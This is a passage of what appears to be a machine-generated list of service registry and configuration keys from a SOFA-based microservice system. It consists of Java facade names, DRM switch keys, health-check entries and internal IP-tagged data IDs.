@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.backend.TmallStoreManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.ProcessTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:riskdatacenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.fundcard.FundCardDepositRzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskmngcore.common.service.facade.api.EntityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcenter.common.service.facade.mct.opt.MBizStrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","astore.anthelloworld.AntGreeter:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.finpwm.clientReadGroupSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mobilecommunity.biz.community.drm.CommunityShareCfgResource.globalAuditConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_mtTaskReviewCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.ToolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.comparacenter.common.service.facade.ComParaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwjdkvii@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.CertMasterKeyQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatafactory.common.service.facade.DataGovRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbindustryomp.common.service.facade.api.plan.OperationPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiletms.common.service.facade.TemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.120.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrmcore.common.service.facade.service.project.ProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.test.integration.generic.facade.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.riskFreeRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecocheck.common.service.meshypromo.MeshypromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.neardata.query.service.ShopAppQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.query.OpsQueryService:1.0:lifecycle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.83.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.ProductUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorResultScanBatchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.160.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:agootwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.topic.api.TopicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mfinsecu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcInstReconLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.msg.MsgTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsFundInstructQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.clientSwitchOnLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue18#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rccenter.common.service.facade.RccenterInstInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.BlackDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardOutFundCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:specialAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imatranslate.facade.service.TranslationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:iamlcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rescue.common.service.facade.PlanExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:raycloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.contentfusionConfigDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.task.MessageAsyncTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.136.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.astaralarm.common.service.facade.kie.JvmRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.custdpc.scheduler.SchedulerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepprod.common.service.facade.api.TransBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.amy.service.facade.spi.GiftReceiveRuleCallbackService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:tbasemanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minicore.common.service.facade.miniapp.api.AppConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@publichome#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentFinishDateRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:templateStatusChangeProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkebankcore_enterpriseOperatorManageCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.whitelist.WhiteListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcms.core.service.selfpos.SelfPosRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.core.service.guardian.OssFileInstanceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.CreditControlEventFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_financialNetworkCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.OrganizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.prodtrans.senior.manage.facade.GroupRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.common.service.facade.widget.mng.WidgetUIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.218.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imkteye@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.SlaConfigResource.batchAgentDispatchCountCluster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.InvoiceRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.TrustBaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExStandardProductRateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:fundcardprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dacuprod.service.facade.DeployGraphServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fraudmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_FISCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.influxHoldComposeExchangeCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.biz.shared.service.task.TaskDefQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.MessageResendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openexprod.common.service.facade.SwitchCoreQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paymentmngTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filecore.service.facade.api.FileAssembleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.operation.facade.OperationJdbcwriterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.deepsis.service.facade.JiebLoanApplyBackendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-1000009@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cashiercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkregulator_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@promokernel#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.echox.service.EchoxAopPlaybackService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:socplt@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktTaskFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.MerchantSwitchTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.promotioncenter.core.service.CouponSearchReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:tmnotify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-FRDSPCORE-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_FILEBRIDGE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.overseacommon.common.components.twa.facade.TwaAdapterFacade:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseacommon.common.components.twa.facade.TwaAdapterFacade:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.core.config.api.LocalCacheManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.CommonVirtualCardManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.mirror.service.EchoxMirrorMockConfigService:1.0:${echox_test}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.oraclerevcore_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.mma.facade.api.UserMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.util.components.nosql.hbase.SimpleHbaseConnector.opTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.statusbar.common.service.callback.StatusbarCallBackFacade:1.0:salesmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.external.ExternalDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.supervise.MarginCallInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbenefit.service.accounting.AccountingMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.MedicalPolicySearchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.astore.gateway.api.ShopReadService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.customerv2_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frscenter.common.service.facade.api.ScenarioRunStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ddsconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.CacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.DuplicateCheckService:1.0:duplicateCheckService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_CERTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.RuleEngineService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmmccore.bus.service.facade.BizInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.common.McommentCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.permission.PermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_compulsoryDeduction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.MemoTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.tenant.spi.TenantInitSpi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dsmp4int_antprocess_callback_finish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.financialfestival.api.HotSellInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:aiapidocmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.commissionNotifySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpaycore.common.service.facade.DepositVerifyQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.EbppRefundAfterLiquidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.ICPValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ApAutomaticSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.SignedServiceFacade:1.0:@fccryptprod_service_unique_id@@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeSubjoinManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.ConclusionFeedbackServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.fpaVoucherExpire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.script.api.GoldSelectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityProjectLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promokernel.common.service.facade.api.CountControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.core.service.kbbase.AssetAssignRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.TXBusinessHallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.RegionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.SignCardModifyUnifygwDrmResource.isOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.sp.FrontCallBack:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditFreeCardManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antrecluse.facade.OracleSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.regionStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mindv.okcourse.service.OkIntegralMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.predict.PredictVolumeDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.LogConfig.perfUpperMillsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insautomarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcsc.common.service.facade.ds.DataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:instradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.core.service.comment.service.CommentIndexDomainGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskInnerSetupService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkfundbuss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecTaskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:finxbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.linkShadowSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.secdatacontext.common.facade.api.manage.ComputationTripletVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:clearCommunityNickNameAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.MrpcAssistantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.product.service.ProductOnSaleNotifyRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.xy.UniversalUnitUserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.service.gw.common.api.SettingManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.base.service.FinsignViewService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwsap.common.service.facade.datasource.DatasourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dcprod.common.service.facade.ExternalBillBatchCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cloudinc.cloudincDatasource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.3.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeco.facade.qualitymarket.QualityTreeNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.manage.facade.GzoneDBUpdateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ismartx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dss.endpoint.rest.facade.FaviconRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantEncashConfigDrm.grantNoWithEncashTimeBaseOnSystemTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.grscore.core.service.facade.dataresource.api.AccessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.merchant.MerchantOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConfigContextManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kmi.common.service.facade.KeyManagerFacade:1.0@DEFAULT#@#DEFAULT_I